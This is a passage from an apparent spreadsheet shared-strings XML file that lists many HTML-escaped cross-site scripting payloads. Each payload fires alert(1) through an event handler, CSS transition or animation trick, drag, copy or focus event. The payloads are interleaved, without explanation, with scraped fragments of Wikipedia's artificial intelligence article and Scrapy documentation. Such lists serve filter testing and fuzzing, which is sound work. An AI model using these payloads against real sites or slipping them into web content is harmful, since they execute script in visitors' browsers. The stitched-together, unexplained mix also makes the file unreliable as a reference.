  </si>
  <si>
    <t>&lt;sup id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmousemove="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onpointermove=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Definitions"&gt;&lt;span class="tocnumber"&gt;2 </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;td id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;noframes id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/dynamic-content.html"&gt;&lt;span class="doc"&gt;Selecting dynamically-loaded content</t>
  </si>
  <si>
    <t>&lt;sup onblur=alert(1) tabindex=1 id=x&gt;&lt;/sup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;DH Author, 'Why Are There Still So Many Jobs? The History and Future of Workplace Automation' (2015) 29(3) Journal of Economic Perspectives 3. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;del draggable="true" ondragleave="alert(1)"&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;main onmousemove="alert(1)"&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;colgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onmouseout="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Daniel_Dennett" title="Daniel Dennett"&gt;Daniel Dennett &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;nobr draggable="true" ondragenter="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;output draggable="true" ondragend="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			&lt;input type="hidden" value="Special:Search" name="title"/&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/multicol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;center oncut="alert(1)" contenteditable&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;474–505 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;section onpointermove=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Automotive </t>
  </si>
  <si>
    <t>&lt;img onmouseleave="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmousemove="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/BEAM_robotics" title="BEAM robotics"&gt;BEAM robotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;head onload=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;tr onbeforepaste="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-360"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-360"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;picture onpointerout=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;element id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nextid style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset onpaste="alert(1)" contenteditable&gt;test&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-34"&gt;&lt;a href="#Evaluating_progress"&gt;&lt;span class="tocnumber"&gt;6.6 </t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 onactivate=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound oncopy="alert(1)" contenteditable&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;th onmouseout="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;param id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/param&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onpointerdown=alert(1)&gt;XSS&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;wbr id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="/wiki/Deep_learning" title="Deep learning"&gt;Deep learning &lt;/a&gt; is any &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural network &lt;/a&gt; that can learn a long chain of causal links&lt;sup class="noprint Inline-Template" style="white-space:nowrap;"&gt;&amp;#91;&lt;i&gt;&lt;a href="/wiki/Wikipedia:Accuracy_dispute#Disputed_statement" title="Wikipedia:Accuracy dispute"&gt;&lt;span title="The material near this tag is possibly inaccurate or nonfactual. (July 2019)"&gt;dubious </t>
  </si>
  <si>
    <t>&lt;address onpointerover=alert(1)&gt;XSS&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;spacer ondblclick="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Bayesian_network" title="Bayesian network"&gt;Bayesian networks &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;Img src = x onerror = "javascript: window.onerror = alert; throw "&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;cite class="citation conference"&gt;&lt;a href="/wiki/Steve_Omohundro" title="Steve Omohundro"&gt;Omohundro, Steve &lt;/a&gt; (2008). &lt;i&gt;The Nature of Self-Improving Artificial Intelligence &lt;/i&gt;. presented and distributed at the 2007 Singularity Summit, San Francisco, CA. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=conference&amp;amp;rft.btitle=The+Nature+of+Self-Improving+Artificial+Intelligence&amp;amp;rft.pub=presented+and+distributed+at+the+2007+Singularity+Summit%2C+San+Francisco%2C+CA.&amp;amp;rft.date=2008&amp;amp;rft.aulast=Omohundro&amp;amp;rft.aufirst=Steve&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;td id=x tabindex=1 onfocus=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;object style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;dd onpointerout=alert(1)&gt;XSS&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onmouseenter="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmouseenter="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onpointerleave=alert(1)&gt;XSS&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;time oncopy="alert(1)" contenteditable&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot oncut="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;dd&gt;Use &lt;a class="reference external" href="https://docs.python.org/3/library/asyncio.html#module-asyncio" title="(in Python v3.8)"&gt;&lt;code class="xref py py-mod docutils literal notranslate"&gt;&lt;span class="pre"&gt;asyncio</t>
  </si>
  <si>
    <t>&lt;code onpointermove=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;applet draggable="true" ondragenter="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_genetics" title="Glossary of genetics"&gt;Genetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style onkeyup="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onbeforepaste="alert(1)" contenteditable&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;rp id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/rp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onpointerdown=alert(1)&gt;XSS&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;tbody id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;input4 onpointerout=alert(1)&gt;XSS&lt;/input4&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Computationalism is the position in the &lt;a href="/wiki/Philosophy_of_mind" title="Philosophy of mind"&gt;philosophy of mind &lt;/a&gt; that the human mind or the human brain (or both) is an information processing system and that thinking is a form of computing.&lt;sup id="cite_ref-403" class="reference"&gt;&lt;a href="#cite_note-403"&gt;&amp;#91;391&amp;#93; &lt;/a&gt; &lt;/sup&gt; Computationalism argues that the relationship between mind and body is similar or identical to the relationship between software and hardware and thus may be a solution to the &lt;a href="/wiki/Mind-body_problem" class="mw-redirect" title="Mind-body problem"&gt;mind-body problem &lt;/a&gt;. This philosophical position was inspired by the work of AI researchers and cognitive scientists in the 1960s and was originally proposed by philosophers &lt;a href="/wiki/Jerry_Fodor" title="Jerry Fodor"&gt;Jerry Fodor &lt;/a&gt; and &lt;a href="/wiki/Hilary_Putnam" title="Hilary Putnam"&gt;Hilary Putnam &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;canvas onmouseout="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmouseenter="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;noembed oncut="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;var oncopy="alert(1)" contenteditable&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;194–310, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.9, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFTaoTan2005" class="citation conference"&gt;Tao, Jianhua; Tan, Tieniu (2005). &lt;i&gt;Affective Computing and Intelligent Interaction &lt;/i&gt;. Affective Computing: A Review. &lt;a href="/wiki/LNCS" class="mw-redirect" title="LNCS"&gt;LNCS &lt;/a&gt; 3784. Springer. pp.&amp;#160;981–995. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1007%2F11573548"&gt;10.1007/11573548 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=conference&amp;amp;rft.btitle=Affective+Computing+and+Intelligent+Interaction&amp;amp;rft.pages=981-995&amp;amp;rft.pub=Springer&amp;amp;rft.date=2005&amp;amp;rft_id=info%3Adoi%2F10.1007%2F11573548&amp;amp;rft.aulast=Tao&amp;amp;rft.aufirst=Jianhua&amp;amp;rft.au=Tan%2C+Tieniu&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;progress ondrop=alert(1) contenteditable&gt;drop here&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;small onmousedown="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;param onmouseout="alert(1)"&gt;test&lt;/param&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Computable_knowledge" title="Template:Computable knowledge"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Computable_knowledge" title="Template talk:Computable knowledge"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Computable_knowledge&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;canvas id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;menuitem onload=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;map onbeforepaste="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;248–258, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dir onmouseover="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-22"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-22"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>document.documentElement.nodeName</t>
  </si>
  <si>
    <t>&lt;article oncut="alert(1)" contenteditable&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>Symbolic vs. sub-symbolic AI:</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;meter ondrop=alert(1) contenteditable&gt;drop here&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;p onmouseenter="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Statistical_learning"&gt;Statistical learning </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Computer_animation" title="Computer animation"&gt;Animation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFBrooks1990"&gt;Brooks 1990 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;image onmouseout="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerup=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmouseover="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;dt onpointerleave=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;section onpaste="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Inductive_reasoning" title="Inductive reasoning"&gt;Inductive reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p draggable="true" ondragstart="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Extract the data from web pages using XPath.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;sub id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;body onhashchange="alert(1)"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=54" title="Edit section: Decrease in demand for human labor"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;del onpointerover=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 onactivate=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;audio autoplay controls onseeked=alert(1)&gt;&lt;source src="validaudio.wav" type="audio/wav"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Robot_rights-406"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Robot_rights_406-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;tfoot draggable="true" ondragenter="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointerup=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;input onmouseover="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onbeforecopy=alert(1) autofocus&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;link rel="stylesheet" href="_static/pygments.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;object onclick="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;li oncopy="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote oncopy="alert(1)" contenteditable&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Artificial neural networks </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-312"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-312"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;blockquote draggable="true" ondragenter="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot id=x tabindex=1 onactivate=alert(1)&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;tbody draggable="true" ondragstart="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;details ondblclick="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFPooleMackworthGoebel1998" class="citation book"&gt;&lt;a href="/w/index.php?title=David_Poole_(researcher)&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="David Poole (researcher) (page does not exist)"&gt;Poole, David &lt;/a&gt;; &lt;a href="/wiki/Alan_Mackworth" title="Alan Mackworth"&gt;Mackworth, Alan &lt;/a&gt;; &lt;a href="/w/index.php?title=Randy_Goebel&amp;amp;action=edit&amp;amp;redlink=1" class="new" title="Randy Goebel (page does not exist)"&gt;Goebel, Randy &lt;/a&gt; (1998). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/computationalint00pool"&gt;&lt;i&gt;Computational Intelligence: A Logical Approach &lt;/i&gt; &lt;/a&gt;. New York: Oxford University Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-19-510270-3" title="Special:BookSources/978-0-19-510270-3"&gt;&lt;bdi&gt;978-0-19-510270-3 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Computational+Intelligence%3A+A+Logical+Approach&amp;amp;rft.place=New+York&amp;amp;rft.pub=Oxford+University+Press&amp;amp;rft.date=1998&amp;amp;rft.isbn=978-0-19-510270-3&amp;amp;rft.aulast=Poole&amp;amp;rft.aufirst=David&amp;amp;rft.au=Mackworth%2C+Alan&amp;amp;rft.au=Goebel%2C+Randy&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fcomputationalint00pool&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Smith, Mark (22 July 2016). &lt;a rel="nofollow" class="external text" href="https://www.bbc.co.uk/news/business-36837824"&gt;"So you think you chose to read this article?" &lt;/a&gt;. &lt;i&gt;BBC News &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160725205007/http://www.bbc.co.uk/news/business-36837824"&gt;Archived &lt;/a&gt; from the original on 25 July 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=BBC+News&amp;amp;rft.atitle=So+you+think+you+chose+to+read+this+article%3F&amp;amp;rft.date=2016-07-22&amp;amp;rft.au=Smith%2C+Mark&amp;amp;rft_id=https%3A%2F%2Fwww.bbc.co.uk%2Fnews%2Fbusiness-36837824&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;article onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/article&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;input id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-387"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-387"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Sample, Ian (18 October 2017). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/science/2017/oct/18/its-able-to-create-knowledge-itself-google-unveils-ai-learns-all-on-its-own"&gt;"&lt;span class="cs1-kern-left"&gt;' </t>
  </si>
  <si>
    <t>&lt;map draggable="true" ondragleave="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;section draggable="true" ondragstart="alert(1)"&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;bdo id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onpointerenter=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;datalist onload=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onpaste="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Carl_Gustav_Hempel" title="Carl Gustav Hempel"&gt;Carl Gustav Hempel &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;table id=x tabindex=1 onactivate=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;tr draggable="true" ondrag="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;code onclick="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;iframe ondblclick="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;caption onclick="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Evolutionary_computation" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Evolutionary_computation" title="Evolutionary computation"&gt;Evolutionary computation &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Main Topics &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;link style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;ul draggable="true" ondrag="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;big style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onmousemove="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;b onload=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Existential_risk_from_artificial_general_intelligence" title="Existential risk from artificial general intelligence"&gt;Existential risk from artificial general intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;sup id="cite_ref-138" class="reference"&gt;&lt;a href="#cite_note-138"&gt;&amp;#91;135&amp;#93; &lt;/a&gt; &lt;/sup&gt; Distributed multi-agent coordination of autonomous vehicles remains a difficult problem.</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Randomized_algorithm" title="Randomized algorithm"&gt;Randomized algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;hgroup onload=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
